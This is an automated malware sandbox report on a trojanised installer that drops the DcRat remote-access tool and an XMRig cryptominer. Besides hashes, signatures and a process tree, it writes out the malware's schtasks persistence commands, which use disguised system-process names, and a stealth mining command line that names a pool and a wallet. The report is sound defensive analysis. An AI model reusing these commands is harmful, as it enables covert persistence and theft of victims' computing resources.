Analysis
-
max time kernel
106s -
max time network
109s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
22-07-2021 22:41
Static task
static1
Behavioral task
behavioral1
Sample
Software v3.0.5.exe
Resource
win7v20210408
Errors
General
-
Target
Software v3.0.5.exe
-
Size
910KB
-
MD5
56d73f0b8c89094a9f0ad6277f042b3d
-
SHA1
6efe8b8257f030fdb63a069aad558b6282310a31
-
SHA256
c6c9d678a3313c5bb7fe71194a2a1e4d3ffca2f04252dd1983ba657cfe17320e
-
SHA512
6f003181b4118e421ec152f1297f7eb5f5e0b3276861c5ba8face20931aa75046dd95672f5120fc7f2acd65db69e0baaee0be7c3ed51a03ec3eab8b24c6a7379
Malware Config
Signatures
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\Dcr.exe Dark_crystal_rat C:\Users\Admin\AppData\Roaming\Dcr.exe Dark_crystal_rat -
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\Dcr.exe dcrat C:\Users\Admin\AppData\Roaming\Dcr.exe dcrat C:\fonthostSvc\fonthostSvcIntodhcp.exe dcrat C:\fonthostSvc\fonthostSvcIntodhcp.exe dcrat C:\Program Files (x86)\Windows Sidebar\conhost.exe dcrat C:\Program Files (x86)\Windows Sidebar\conhost.exe dcrat -
XMRig Miner Payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/2712-198-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral2/memory/2712-199-0x00000001402EB66C-mapping.dmp xmrig behavioral2/memory/2712-201-0x0000000140000000-0x0000000140758000-memory.dmp xmrig -
Executes dropped EXE 9 IoCs
Processes:
Dcr.exeetc.exexmr.exefonthostSvcIntodhcp.execonhost.exeservices64.exeservices32.exesihost64.exesihost32.exepid process 1440 Dcr.exe 1584 etc.exe 1852 xmr.exe 1580 fonthostSvcIntodhcp.exe 3172 conhost.exe 2276 services64.exe 2316 services32.exe 2704 sihost64.exe 2184 sihost32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 16 ipinfo.io 17 ipinfo.io -
Drops file in System32 directory 4 IoCs
Processes:
fonthostSvcIntodhcp.exedescription ioc process File created C:\Windows\System32\kbdfar\fontdrvhost.exe fonthostSvcIntodhcp.exe File created C:\Windows\System32\kbdfar\5b884080fd4f94e2695da25c503f9e33b9605b83 fonthostSvcIntodhcp.exe File created C:\Windows\System32\ws2_32\winlogon.exe fonthostSvcIntodhcp.exe File created C:\Windows\System32\ws2_32\cc11b995f2a76da408ea6a601e682e64743153ad fonthostSvcIntodhcp.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
services64.exedescription pid process target process PID 2276 set thread context of 2712 2276 services64.exe explorer.exe -
Drops file in Program Files directory 3 IoCs
Processes:
fonthostSvcIntodhcp.exedescription ioc process File created C:\Program Files (x86)\Windows Sidebar\conhost.exe fonthostSvcIntodhcp.exe File created C:\Program Files (x86)\Windows Sidebar\088424020bedd6b28ac7fd22ee35dcd7322895ce fonthostSvcIntodhcp.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\conhost.exe fonthostSvcIntodhcp.exe -
Drops file in Windows directory 5 IoCs
Processes:
fonthostSvcIntodhcp.exedescription ioc process File created C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxSignature\ShellExperienceHost.exe fonthostSvcIntodhcp.exe File created C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxSignature\f8c8f1285d826bc63910aaf97db97186ba642b4f fonthostSvcIntodhcp.exe File created C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.SmartExtraction\SearchUI.exe fonthostSvcIntodhcp.exe File opened for modification C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.SmartExtraction\SearchUI.exe fonthostSvcIntodhcp.exe File created C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.SmartExtraction\dab4d89cac03ec27dbe47b361df763dc3f848f6c fonthostSvcIntodhcp.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2692 schtasks.exe 3520 schtasks.exe 744 schtasks.exe 1972 schtasks.exe 1560 schtasks.exe 2832 schtasks.exe 1616 schtasks.exe 400 schtasks.exe 3520 schtasks.exe 2004 schtasks.exe -
Modifies data under HKEY_USERS 15 IoCs
Processes:
LogonUI.exedescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "1" LogonUI.exe -
Modifies registry class 1 IoCs
Processes:
Dcr.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings Dcr.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
Processes:
fonthostSvcIntodhcp.execonhost.exeetc.exexmr.exeservices32.exeservices64.exepid process 1580 fonthostSvcIntodhcp.exe 1580 fonthostSvcIntodhcp.exe 1580 fonthostSvcIntodhcp.exe 1580 fonthostSvcIntodhcp.exe 1580 fonthostSvcIntodhcp.exe 3172 conhost.exe 3172 conhost.exe 1584 etc.exe 1852 xmr.exe 2316 services32.exe 2276 services64.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
fonthostSvcIntodhcp.execonhost.exeetc.exexmr.exeservices32.exeservices64.exeexplorer.exedescription pid process Token: SeDebugPrivilege 1580 fonthostSvcIntodhcp.exe Token: SeDebugPrivilege 3172 conhost.exe Token: SeDebugPrivilege 1584 etc.exe Token: SeDebugPrivilege 1852 xmr.exe Token: SeDebugPrivilege 2316 services32.exe Token: SeDebugPrivilege 2276 services64.exe Token: SeLockMemoryPrivilege 2712 explorer.exe Token: SeLockMemoryPrivilege 2712 explorer.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
LogonUI.exepid process 1560 LogonUI.exe 1560 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Software v3.0.5.exeDcr.exeWScript.execmd.exefonthostSvcIntodhcp.exexmr.exeetc.execmd.execmd.exeservices32.exeservices64.execmd.execmd.exedescription pid process target process PID 3256 wrote to memory of 1440 3256 Software v3.0.5.exe Dcr.exe PID 3256 wrote to memory of 1440 3256 Software v3.0.5.exe Dcr.exe PID 3256 wrote to memory of 1440 3256 Software v3.0.5.exe Dcr.exe PID 3256 wrote to memory of 1584 3256 Software v3.0.5.exe etc.exe PID 3256 wrote to memory of 1584 3256 Software v3.0.5.exe etc.exe PID 3256 wrote to memory of 1852 3256 Software v3.0.5.exe xmr.exe PID 3256 wrote to memory of 1852 3256 Software v3.0.5.exe xmr.exe PID 1440 wrote to memory of 1884 1440 Dcr.exe WScript.exe PID 1440 wrote to memory of 1884 1440 Dcr.exe WScript.exe PID 1440 wrote to memory of 1884 1440 Dcr.exe WScript.exe PID 1884 wrote to memory of 2876 1884 WScript.exe cmd.exe PID 1884 wrote to memory of 2876 1884 WScript.exe cmd.exe PID 1884 wrote to memory of 2876 1884 WScript.exe cmd.exe PID 2876 wrote to memory of 1580 2876 cmd.exe fonthostSvcIntodhcp.exe PID 2876 wrote to memory of 1580 2876 cmd.exe fonthostSvcIntodhcp.exe PID 1580 wrote to memory of 2692 1580 fonthostSvcIntodhcp.exe schtasks.exe PID 1580 wrote to memory of 2692 1580 fonthostSvcIntodhcp.exe schtasks.exe PID 1580 wrote to memory of 2832 1580 fonthostSvcIntodhcp.exe schtasks.exe PID 1580 wrote to memory of 2832 1580 fonthostSvcIntodhcp.exe schtasks.exe PID 1580 wrote to memory of 1616 1580 fonthostSvcIntodhcp.exe schtasks.exe PID 1580 wrote to memory of 1616 1580 fonthostSvcIntodhcp.exe schtasks.exe PID 1580 wrote to memory of 3520 1580 fonthostSvcIntodhcp.exe schtasks.exe PID 1580 wrote to memory of 3520 1580 fonthostSvcIntodhcp.exe schtasks.exe PID 1580 wrote to memory of 744 1580 fonthostSvcIntodhcp.exe schtasks.exe PID 1580 wrote to memory of 744 1580 fonthostSvcIntodhcp.exe schtasks.exe PID 1580 wrote to memory of 1972 1580 fonthostSvcIntodhcp.exe schtasks.exe PID 1580 wrote to memory of 1972 1580 fonthostSvcIntodhcp.exe schtasks.exe PID 1580 wrote to memory of 3172 1580 fonthostSvcIntodhcp.exe conhost.exe PID 1580 wrote to memory of 3172 1580 fonthostSvcIntodhcp.exe conhost.exe PID 1852 wrote to memory of 2544 1852 xmr.exe cmd.exe PID 1852 wrote to memory of 2544 1852 xmr.exe cmd.exe PID 1584 wrote to memory of 3372 1584 etc.exe cmd.exe PID 1584 wrote to memory of 3372 1584 etc.exe cmd.exe PID 2544 wrote to memory of 1560 2544 cmd.exe schtasks.exe PID 2544 wrote to memory of 1560 2544 cmd.exe schtasks.exe PID 3372 wrote to memory of 400 3372 cmd.exe schtasks.exe PID 3372 wrote to memory of 400 3372 cmd.exe schtasks.exe PID 1584 wrote to memory of 2316 1584 etc.exe services32.exe PID 1584 wrote to memory of 2316 1584 etc.exe services32.exe PID 1852 wrote to memory of 2276 1852 xmr.exe services64.exe PID 1852 wrote to memory of 2276 1852 xmr.exe services64.exe PID 2316 wrote to memory of 1844 2316 services32.exe cmd.exe PID 2316 wrote to memory of 1844 2316 services32.exe cmd.exe PID 2276 wrote to memory of 3028 2276 services64.exe cmd.exe PID 2276 wrote to memory of 3028 2276 services64.exe cmd.exe PID 2316 wrote to memory of 2184 2316 services32.exe sihost32.exe PID 2316 wrote to memory of 2184 2316 services32.exe sihost32.exe PID 2276 wrote to memory of 2704 2276 services64.exe sihost64.exe PID 2276 wrote to memory of 2704 2276 services64.exe sihost64.exe PID 3028 wrote to memory of 3520 3028 cmd.exe schtasks.exe PID 3028 wrote to memory of 3520 3028 cmd.exe schtasks.exe PID 1844 wrote to memory of 2004 1844 cmd.exe schtasks.exe PID 1844 wrote to memory of 2004 1844 cmd.exe schtasks.exe PID 2276 wrote to memory of 2712 2276 services64.exe explorer.exe PID 2276 wrote to memory of 2712 2276 services64.exe explorer.exe PID 2276 wrote to memory of 2712 2276 services64.exe explorer.exe PID 2276 wrote to memory of 2712 2276 services64.exe explorer.exe PID 2276 wrote to memory of 2712 2276 services64.exe explorer.exe PID 2276 wrote to memory of 2712 2276 services64.exe explorer.exe PID 2276 wrote to memory of 2712 2276 services64.exe explorer.exe PID 2276 wrote to memory of 2712 2276 services64.exe explorer.exe PID 2276 wrote to memory of 2712 2276 services64.exe explorer.exe PID 2276 wrote to memory of 2712 2276 services64.exe explorer.exe PID 2276 wrote to memory of 2712 2276 services64.exe explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Software v3.0.5.exe"C:\Users\Admin\AppData\Local\Temp\Software v3.0.5.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Dcr.exeC:\Users\Admin\AppData\Roaming\Dcr.exe2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\fonthostSvc\5R3FFGftzpp.vbe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\fonthostSvc\RJz6D4NNsdJ6mtrTpIKV9136D.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\fonthostSvc\fonthostSvcIntodhcp.exe"C:\fonthostSvc\fonthostSvcIntodhcp.exe"5⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "SearchUI" /sc ONLOGON /tr "'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.SmartExtraction\SearchUI.exe'" /rl HIGHEST /f6⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Sidebar\conhost.exe'" /rl HIGHEST /f6⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\System32\kbdfar\fontdrvhost.exe'" /rl HIGHEST /f6⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxSignature\ShellExperienceHost.exe'" /rl HIGHEST /f6⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\PerfLogs\ShellExperienceHost.exe'" /rl HIGHEST /f6⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\System32\ws2_32\winlogon.exe'" /rl HIGHEST /f6⤵
- Creates scheduled task(s)
-
C:\Program Files (x86)\Windows Sidebar\conhost.exe"C:\Program Files (x86)\Windows Sidebar\conhost.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\etc.exeC:\Users\Admin\AppData\Roaming\etc.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"'4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\services32.exe"C:\Users\Admin\AppData\Roaming\services32.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"' & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"'5⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\xmr.exeC:\Users\Admin\AppData\Roaming\xmr.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'5⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"4⤵
- Executes dropped EXE
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=40 --cinit-idle-wait=3 --cinit-idle-cpu=80 --cinit-stealth4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x0 /state0:0xa3ade855 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\Windows Sidebar\conhost.exeMD5
8cf49d252229ed14a26b9a2b45771e1d
SHA1d53682e13e1f6a1a619c0d1780d86479d388bf0c
SHA25645d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f
SHA512808f85a12bb8ebd9cb11e1e154d937c0bffc3a3781121cf96cc6150cd81cd8d8c6884c19bf73a910853a8b4a73f3bf879d6192158e78e9e4439844d82c0ece0a
-
C:\Program Files (x86)\Windows Sidebar\conhost.exeMD5
8cf49d252229ed14a26b9a2b45771e1d
SHA1d53682e13e1f6a1a619c0d1780d86479d388bf0c
SHA25645d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f
SHA512808f85a12bb8ebd9cb11e1e154d937c0bffc3a3781121cf96cc6150cd81cd8d8c6884c19bf73a910853a8b4a73f3bf879d6192158e78e9e4439844d82c0ece0a
-
C:\Users\Admin\AppData\Roaming\Dcr.exeMD5
975a0ad02701f9f528784dee5a9728d2
SHA18a3b57da095dd6fc9d61fe004c1025d929370515
SHA256b0833db8843046dac1e15dd54871a77154fc7692395f216ab1966472ac87d19b
SHA5126d216c2d2cd0bcb427cedeb2c87045b4b346cd32481fed5008cdcea567067d357961958c255c7181ad291c129309f43afe4dc6c74416db8badf1fcc26f9b4503
-
C:\Users\Admin\AppData\Roaming\Dcr.exeMD5
975a0ad02701f9f528784dee5a9728d2
SHA18a3b57da095dd6fc9d61fe004c1025d929370515
SHA256b0833db8843046dac1e15dd54871a77154fc7692395f216ab1966472ac87d19b
SHA5126d216c2d2cd0bcb427cedeb2c87045b4b346cd32481fed5008cdcea567067d357961958c255c7181ad291c129309f43afe4dc6c74416db8badf1fcc26f9b4503
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exeMD5
89c453dbd36f561195de8e5c5dce77a0
SHA18cc44dd7646ec89b6c22214614a8cab158e47f0c
SHA256ef4ffc14eac837cb6c25996a57f6361a964b10514001ca80a87a4a9f68b5ed6d
SHA512c030af0901b2b8a72bdd8f2222c47e0d8bafdd6d27a6ddd569523c6f4fe8248d3d6e26c8ac5a201998d21dbc931e40d14b7a8ee254c7958d3ecf279efa79692c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exeMD5
89c453dbd36f561195de8e5c5dce77a0
SHA18cc44dd7646ec89b6c22214614a8cab158e47f0c
SHA256ef4ffc14eac837cb6c25996a57f6361a964b10514001ca80a87a4a9f68b5ed6d
SHA512c030af0901b2b8a72bdd8f2222c47e0d8bafdd6d27a6ddd569523c6f4fe8248d3d6e26c8ac5a201998d21dbc931e40d14b7a8ee254c7958d3ecf279efa79692c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exeMD5
7059ba6625325156b764224d2b2dbd83
SHA14cc34def0b7d39b913559f539e6d58a3e363f2e3
SHA25604c22c0e2f4f675e168a74f8320125d2c2e13f2c8d9bbfe237c95c116ca95608
SHA512ffda3be8b17404b2e3afadfeed9e28a26a67c9f5512a0422616dfc49ed43554f220a497702da6f773815c29f7a2cc71d6b462185002bba883679b55ffd0c4506
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exeMD5
7059ba6625325156b764224d2b2dbd83
SHA14cc34def0b7d39b913559f539e6d58a3e363f2e3
SHA25604c22c0e2f4f675e168a74f8320125d2c2e13f2c8d9bbfe237c95c116ca95608
SHA512ffda3be8b17404b2e3afadfeed9e28a26a67c9f5512a0422616dfc49ed43554f220a497702da6f773815c29f7a2cc71d6b462185002bba883679b55ffd0c4506
-
C:\Users\Admin\AppData\Roaming\etc.exeMD5
b07420edcab9bae1bb3fe4befc7ee57c
SHA141ae0d56b863d8155865548e8231e1994e197c21
SHA2562ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639
SHA512584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5
-
C:\Users\Admin\AppData\Roaming\etc.exeMD5
b07420edcab9bae1bb3fe4befc7ee57c
SHA141ae0d56b863d8155865548e8231e1994e197c21
SHA2562ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639
SHA512584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5
-
C:\Users\Admin\AppData\Roaming\services32.exeMD5
b07420edcab9bae1bb3fe4befc7ee57c
SHA141ae0d56b863d8155865548e8231e1994e197c21
SHA2562ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639
SHA512584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5
-
C:\Users\Admin\AppData\Roaming\services32.exeMD5
b07420edcab9bae1bb3fe4befc7ee57c
SHA141ae0d56b863d8155865548e8231e1994e197c21
SHA2562ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639
SHA512584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5
-
C:\Users\Admin\AppData\Roaming\services64.exeMD5
f99c879d74bf1355905734a411191276
SHA1103a41ade035585e4834f7b939e15608fb64d201
SHA256eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe
SHA512e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4
-
C:\Users\Admin\AppData\Roaming\services64.exeMD5
f99c879d74bf1355905734a411191276
SHA1103a41ade035585e4834f7b939e15608fb64d201
SHA256eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe
SHA512e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4
-
C:\Users\Admin\AppData\Roaming\xmr.exeMD5
f99c879d74bf1355905734a411191276
SHA1103a41ade035585e4834f7b939e15608fb64d201
SHA256eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe
SHA512e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4
-
C:\Users\Admin\AppData\Roaming\xmr.exeMD5
f99c879d74bf1355905734a411191276
SHA1103a41ade035585e4834f7b939e15608fb64d201
SHA256eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe
SHA512e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4
-
C:\fonthostSvc\5R3FFGftzpp.vbeMD5
cb60c41590dc32740e8923ba0cb6df97
SHA1aabc007b611df20e79fceee539ef63e7f2754304
SHA256c48aa50f0879775b7f0d878898cc662b8ea0412f401fb6c17be945ffd63cfda2
SHA512a42de214aef793c75cf1928c0734b65bd1817c4b36aae663c9119539ab8bec6b7e1881d8ad971a2fc4e8afe09958bc395928ce5e3eb393cb5b755e14e71264da
-
C:\fonthostSvc\RJz6D4NNsdJ6mtrTpIKV9136D.batMD5
7245c594f9448bae4a79764fb6897e25
SHA11eb300765111494f6c7049b5abbbb0e5725b39aa
SHA2564fa6f4b4721eadae3ce004cefa98cfd8503e5f8dc0cc553d4db012a84c9eefa5
SHA51226c00c8a5e2cee0f8779cb9b9cec7efc1712c82c8db8fb0d3d3a7e997a8ccf1ebc0fef8b35cb129a111bdb3c224c111c77b347d50252bb601293a73dc30445c8
-
C:\fonthostSvc\fonthostSvcIntodhcp.exeMD5
8cf49d252229ed14a26b9a2b45771e1d
SHA1d53682e13e1f6a1a619c0d1780d86479d388bf0c
SHA25645d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f
SHA512808f85a12bb8ebd9cb11e1e154d937c0bffc3a3781121cf96cc6150cd81cd8d8c6884c19bf73a910853a8b4a73f3bf879d6192158e78e9e4439844d82c0ece0a
-
C:\fonthostSvc\fonthostSvcIntodhcp.exeMD5
8cf49d252229ed14a26b9a2b45771e1d
SHA1d53682e13e1f6a1a619c0d1780d86479d388bf0c
SHA25645d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f
SHA512808f85a12bb8ebd9cb11e1e154d937c0bffc3a3781121cf96cc6150cd81cd8d8c6884c19bf73a910853a8b4a73f3bf879d6192158e78e9e4439844d82c0ece0a
-
memory/400-163-0x0000000000000000-mapping.dmp
-
memory/744-143-0x0000000000000000-mapping.dmp
-
memory/1440-114-0x0000000000000000-mapping.dmp
-
memory/1560-162-0x0000000000000000-mapping.dmp
-
memory/1580-138-0x000000001BA00000-0x000000001BA02000-memory.dmpFilesize
8KB
-
memory/1580-136-0x0000000000CC0000-0x0000000000CC1000-memory.dmpFilesize
4KB
-
memory/1580-133-0x0000000000000000-mapping.dmp
-
memory/1584-164-0x000000001D1C0000-0x000000001D1C2000-memory.dmpFilesize
8KB
-
memory/1584-159-0x00000000019F0000-0x00000000019F1000-memory.dmpFilesize
4KB
-
memory/1584-116-0x0000000000000000-mapping.dmp
-
memory/1584-156-0x0000000001720000-0x0000000001726000-memory.dmpFilesize
24KB
-
memory/1584-124-0x0000000000F20000-0x0000000000F21000-memory.dmpFilesize
4KB
-
memory/1616-141-0x0000000000000000-mapping.dmp
